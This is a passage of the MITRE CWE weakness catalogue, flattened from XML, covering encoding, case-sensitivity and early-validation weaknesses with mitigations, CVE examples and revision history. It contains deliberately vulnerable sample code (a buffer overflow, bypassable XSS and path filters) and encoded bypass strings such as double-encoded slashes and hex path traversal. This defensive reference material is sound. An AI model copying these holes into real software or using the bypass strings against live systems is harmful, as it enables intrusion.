CWE Content Team - MITRE - 2019-01-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - - - - The software does not properly handle when an input uses an alternate encoding that is valid for the control sphere to which the input is being sent. - - - - - - - - - - Implementation - - - - - Access Control - Bypass Protection Mechanism - - - - - Architecture and Design - Input Validation - Avoid making decisions based on names of resources (e.g. files) if those resources can have alternate names. - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - Implementation - Output Encoding - Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component. - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - Alternate Encoding - - - - - - - - - - - - - - - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-12-13 - updated Name - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2019-01-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Alternate Encoding - Failure to Handle Alternate Encoding - - - - The software decodes the same input twice, which can limit the effectiveness of any protection mechanism that occurs in between the decoding operations. - - - - - - - - - - Implementation - - - - - Access Control - Confidentiality - Availability - Integrity - Other - Bypass Protection Mechanism - Execute Unauthorized Code or Commands - Varies by Context - - - - - Architecture and Design - Input Validation - Avoid making decisions based on names of resources (e.g. files) if those resources can have alternate names. - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - Implementation - Output Encoding - Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component. - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - CVE-2004-1315 - Forum software improperly URL decodes the highlight parameter when extracting text to highlight, which allows remote attackers to execute arbitrary PHP code by double-encoding the highlight value so that special characters are inserted into the result. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1315 - - - CVE-2004-1939 - XSS protection mechanism attempts to remove "/" that could be used to close tags, but it can be bypassed using double encoded slashes (%252F) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1939 - - - CVE-2001-0333 - Directory traversal using double encoding. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0333 - - - CVE-2004-1938 - "%2527" (double-encoded single quote) used in SQL injection. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1938 - - - CVE-2005-1945 - Double hex-encoded data. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1945 - - - CVE-2005-0054 - Browser executes HTML at higher privileges via URL with hostnames that are double hex encoded, which are decoded twice to generate a malicious hostname. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0054 - - - - - Double Encoding - - - - Probably under-studied. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Observed_Example, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Observed_Examples - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Double Encoding - - - - The software does not properly handle when the same input uses several different (mixed) encodings. - - - - - - - - - Implementation - - - - - Integrity - Unexpected State - - - - - Architecture and Design - Input Validation - Avoid making decisions based on names of resources (e.g. files) if those resources can have alternate names. - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - Implementation - Output Encoding - Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component. - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - Mixed Encoding - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-12-13 - updated Name - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Mixed Encoding - Failure to Handle Mixed Encoding - - - - The software does not properly handle when an input contains Unicode encoding. - - - - - - - - - Implementation - - - - - Integrity - Unexpected State - - - - - Architecture and Design - Input Validation - Avoid making decisions based on names of resources (e.g. files) if those resources can have alternate names. - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - Windows provides the MultiByteToWideChar(), WideCharToMultiByte(), UnicodeToBytes(), and BytesToUnicode() functions to convert between arbitrary multibyte (usually ANSI) character strings and Unicode (wide character) strings. The size arguments to these functions are specified in different units, (one in bytes, the other in characters) making their use prone to error. - In a multibyte character string, each character occupies a varying number of bytes, and therefore the size of such strings is most easily specified as a total number of bytes. In Unicode, however, characters are always a fixed size, and string lengths are typically given by the number of characters they contain. Mistakenly specifying the wrong units in a size argument can lead to a buffer overflow. - The following function takes a username specified as a multibyte string and a pointer to a structure for user information and populates the structure with information about the specified user. Since Windows authentication uses Unicode for usernames, the username argument is first converted from a multibyte string to a Unicode string. - - void getUserInfo(char *username, struct _USER_INFO_2 info){WCHAR unicodeUser[UNLEN+1];MultiByteToWideChar(CP_ACP, 0, username, -1, unicodeUser, sizeof(unicodeUser));NetUserGetInfo(NULL, unicodeUser, 2, (LPBYTE *)&info);} - - This function incorrectly passes the size of unicodeUser in bytes instead of characters. The call to MultiByteToWideChar() can therefore write up to (UNLEN+1)*sizeof(WCHAR) wide characters, or (UNLEN+1)*sizeof(WCHAR)*sizeof(WCHAR) bytes, to the unicodeUser array, which has only (UNLEN+1)*sizeof(WCHAR) bytes allocated. - If the username string contains more than UNLEN characters, the call to MultiByteToWideChar() will overflow the buffer unicodeUser. - - - - - CVE-2000-0884 - Server allows remote attackers to read documents outside of the web root, and possibly execute arbitrary commands, via malformed URLs that contain Unicode encoded characters. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0884 - - - CVE-2001-0709 - Server allows a remote attacker to obtain source code of ASP files via a URL encoded with Unicode. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0709 - - - CVE-2001-0669 - Overlaps interaction error. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0669 - - - - - Unicode Encoding - - - MSC10-C - Character Encoding - UTF8 Related Issues - - - - - - - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-12-13 - updated Name - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Observed_Examples, References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Unicode Encoding - Failure to Handle Unicode Encoding - - - - The software does not properly handle when all or part of an input has been URL encoded. - - - - - - - - - Implementation - - - - - Integrity - Unexpected State - - - - - Architecture and Design - Input Validation - Avoid making decisions based on names of resources (e.g. files) if those resources can have alternate names. - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - CVE-2000-0900 - Hex-encoded path traversal variants - "%2e%2e", "%2e%2e%2f", "%5c%2e%2e" - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0900 - - - CVE-2005-2256 - Hex-encoded path traversal variants - "%2e%2e", "%2e%2e%2f", "%5c%2e%2e" - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2256 - - - CVE-2004-2121 - Hex-encoded path traversal variants - "%2e%2e", "%2e%2e%2f", "%5c%2e%2e" - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2121 - - - CVE-2004-0280 - "%20" (encoded space) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0280 - - - CVE-2003-0424 - "%20" (encoded space) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0424 - - - CVE-2001-0693 - "%20" (encoded space) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0693 - - - CVE-2001-0778 - "%20" (encoded space) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0778 - - - CVE-2002-1831 - Crash via hex-encoded space "%20". - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1831 - - - CVE-2000-0671 - "%00" (encoded null) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0671 - - - CVE-2004-0189 - "%00" (encoded null) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0189 - - - CVE-2002-1291 - "%00" (encoded null) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1291 - - - CVE-2002-1031 - "%00" (encoded null) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1031 - - - CVE-2001-1140 - "%00" (encoded null) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1140 - - - CVE-2004-0760 - "%00" (encoded null) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0760 - - - CVE-2002-1025 - "%00" (encoded null) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1025 - - - CVE-2002-1213 - "%2f" (encoded slash) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1213 - - - CVE-2004-0072 - "%5c" (encoded backslash) and "%2e" (encoded dot) sequences - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0072 - - - CVE-2004-0847 - "%5c" (encoded backslash) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0847 - - - CVE-2002-1575 - "%0a" (overlaps CRLF) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1575 - - - - - URL Encoding (Hex Encoding) - - - - - - - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - Veracode - 2008-08-15 - Suggested OWASP Top Ten 2004 mapping - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Observed_Example, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-12-13 - updated Name - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2019-01-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - URL Encoding (Hex Encoding) - Failure to Handle URL Encoding (Hex Encoding) - - - - The software does not properly account for differences in case sensitivity when accessing or determining the properties of a resource, leading to inconsistent results. - - Improperly handled case sensitive data can lead to several possible consequences, including: - - - case-insensitive passwords reducing the size of the key space, making brute force attacks easier - bypassing filters or access controls using alternate names - multiple interpretation errors using alternate names. - - - - - - - - - - - - - - - Implementation - - - - - Access Control - Bypass Protection Mechanism - - - - - Architecture and Design - Input Validation - Avoid making decisions based on names of resources (e.g. files) if those resources can have alternate names. - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - In the following example, an XSS neutralization method intends to replace script tags in user-supplied input with a safe equivalent: - - public String preventXSS(String input, String mask) {return input.replaceAll("script", mask);} - - The code only works when the "script" tag is in all lower-case, forming an incomplete denylist (CWE-184). Equivalent tags such as "SCRIPT" or "ScRiPt" will not be neutralized by this method, allowing an XSS attack. - - - - - CVE-2000-0499 - Application server allows attackers to bypass execution of a jsp page and read the source code using an upper case JSP extension in the request. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0499 - - - CVE-2000-0497 - The server is case sensitive, so filetype handlers treat .jsp and .JSP as different extensions. JSP source code may be read because .JSP defaults to the filetype "text". - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0497 - - - CVE-2000-0498 - The server is case sensitive, so filetype handlers treat .jsp and .JSP as different extensions. JSP source code may be read because .JSP defaults to the filetype "text". - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0498 - - - CVE-2001-0766 - A URL that contains some characters whose case is not matched by the server's filters may bypass access restrictions because the case-insensitive file system will then handle the request after it bypasses the case sensitive filter. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0766 - - - CVE-2001-0795 - Server allows remote attackers to obtain source code of CGI scripts via URLs that contain MS-DOS conventions such as (1) upper case letters or (2) 8.3 file names. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0795 - - - CVE-2001-1238 - Task Manager does not allow local users to end processes with uppercase letters named (1) winlogon.exe, (2) csrss.exe, (3) smss.exe and (4) services.exe via the Process tab which could allow local users to install Trojan horses that cannot be stopped. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1238 - - - CVE-2003-0411 - chain: Code was ported from a case-sensitive Unix platform to a case-insensitive Windows platform where filetype handlers treat .jsp and .JSP as different extensions. JSP source code may be read because .JSP defaults to the filetype "text". - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0411 - - - CVE-2002-0485 - Leads to interpretation error - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0485 - - - CVE-1999-0239 - Directories may be listed because lower case web requests are not properly handled by the server. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0239 - - - CVE-2005-0269 - File extension check in forum software only verifies extensions that contain all lowercase letters, which allows remote attackers to upload arbitrary files via file extensions that include uppercase letters. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0269 - - - CVE-2004-1083 - Web server restricts access to files in a case sensitive manner, but the filesystem accesses files in a case insensitive manner, which allows remote attackers to read privileged files using alternate capitalization. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1083 - - - CVE-2002-2119 - Case insensitive passwords lead to search space reduction. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2119 - - - CVE-2004-2214 - HTTP server allows bypass of access restrictions using URIs with mixed case. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2214 - - - CVE-2004-2154 - Mixed upper/lowercase allows bypass of ACLs. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2154 - - - CVE-2005-4509 - Bypass malicious script detection by using tokens that aren't case sensitive. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4509 - - - CVE-2002-1820 - Mixed case problem allows "admin" to have "Admin" rights (alternate name property). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1820 - - - CVE-2007-3365 - Chain: uppercase file extensions causes web server to return script source code instead of executing the script. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3365 - - - - File Processing - - - File or Directory - - - - Case Sensitivity (lowercase, uppercase, mixed case) - - - - These are probably under-studied in Windows and Mac environments, where file names are case-insensitive and thus are subject to equivalence manipulations involving case. - - - - PLOVER - 2006-07-19 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Observed_Example, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Observed_Examples - - - CWE Content Team - MITRE - 2008-11-24 - updated Observed_Examples - - - CWE Content Team - MITRE - 2009-03-10 - updated Description - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-06-21 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2010-12-13 - updated Name - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Demonstrative_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Affected_Resources, Applicable_Platforms, Functional_Areas, Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Demonstrative_Examples, Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - Case Sensitivity (Lowercase, Uppercase, Mixed Case) - Failure to Resolve Case Sensitivity - - - - The software validates input before applying protection mechanisms that modify the input, which could allow an attacker to bypass the validation via dangerous inputs that only arise after the modification. - Software needs to validate data at the proper time, after data has been canonicalized and cleansed. Early validation is susceptible to various manipulations that result in dangerous inputs that are produced by canonicalization and cleansing. - - - - - - - - - - Implementation - Since early validation errors usually arise from improperly implemented defensive mechanisms, it is likely that these will be introduced more frequently as secure programming becomes implemented more widely. - - - - - Access Control - Integrity - Bypass Protection Mechanism - Execute Unauthorized Code or Commands - An attacker could include dangerous input that bypasses validation protection mechanisms which can be used to launch various attacks including injection attacks, execute arbitrary code or cause other unintended behavior. - - - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - The following code attempts to validate a given input path by checking it against an allowlist and then return the canonical path. In this specific case, the path is considered valid if it starts with the string "/safe_dir/". - - String path = getInputPath();if (path.startsWith("/safe_dir/")){File f = new File(path);return f.getCanonicalPath();} - - The problem with the above code is that the validation step occurs before canonicalization occurs. An attacker could provide an input path of "/safe_dir/../" that would pass the validation step. However, the canonicalization process sees the double dot as a traversal to the parent directory and hence when canonicized the path would become just "/". - To avoid this problem, validation should occur after canonicalization takes place. In this case canonicalization occurs during the initialization of the File object. The code below fixes the issue. - - String path = getInputPath();File f = new File(path);if (f.getCanonicalPath().startsWith("/safe_dir/")){return f.getCanonicalPath();} - - - - - - This script creates a subdirectory within a user directory and sets the user as the owner. - - function createDir($userName,$dirName){$userDir = '/users/'. $userName;if(strpos($dirName,'..') !== false){echo 'Directory name contains invalid sequence';return;} - //filter out '~' because other scripts identify user directories by this prefix - $dirName = str_replace('~','',$dirName);$newDir = $userDir . $dirName;mkdir($newDir, 0700);chown($newDir,$userName);} - - While the script attempts to screen for '..' sequences, an attacker can submit a directory path including ".~.", which will then become ".." after the filtering step. This allows a Path Traversal (CWE-21) attack to occur. - - - - - CVE-2002-0433 - Product allows remote attackers to view restricted files via an HTTP request containing a "*" (wildcard or asterisk) character. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0433 - - - CVE-2003-0332 - Product modifies the first two letters of a filename extension after performing a security check, which allows remote attackers to bypass authentication via a filename with a .ats extension instead of a .hts extension. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0332 - - - CVE-2002-0802 - Database consumes an extra character when processing a character that cannot be converted, which could remove an escape character from the query and make the application subject to SQL injection attacks. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0802 - - - CVE-2000-0191 - Overlaps "fakechild/../realchild" - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0191 - - - CVE-2004-2363 - Product checks URI for "<" and other literal characters, but does it before hex decoding the URI, so "%3E" and other sequences are allowed. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2363 - - - CVE-2002-0934 - Directory traversal vulnerability allows remote attackers to read or modify arbitrary files via invalid characters between two . (dot) characters, which are filtered and result in a ".." sequence. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0934 - - - CVE-2003-0282 - Directory traversal vulnerability allows attackers to overwrite arbitrary files via invalid characters between two . (dot) characters, which are filtered and result in a ".." sequence. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0282 - - - - - Early Validation Errors - - - - - - - - - - - - These errors are mostly reported in path traversal vulnerabilities, but the concept applies whenever validation occurs. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - Veracode - 2008-08-15 - Suggested OWASP Top Ten 2004 mapping - - - CWE Content Team - MITRE - 2008-09-08 - updated Modes_of_Introduction, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2010-06-21 - updated Research_Gaps - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE 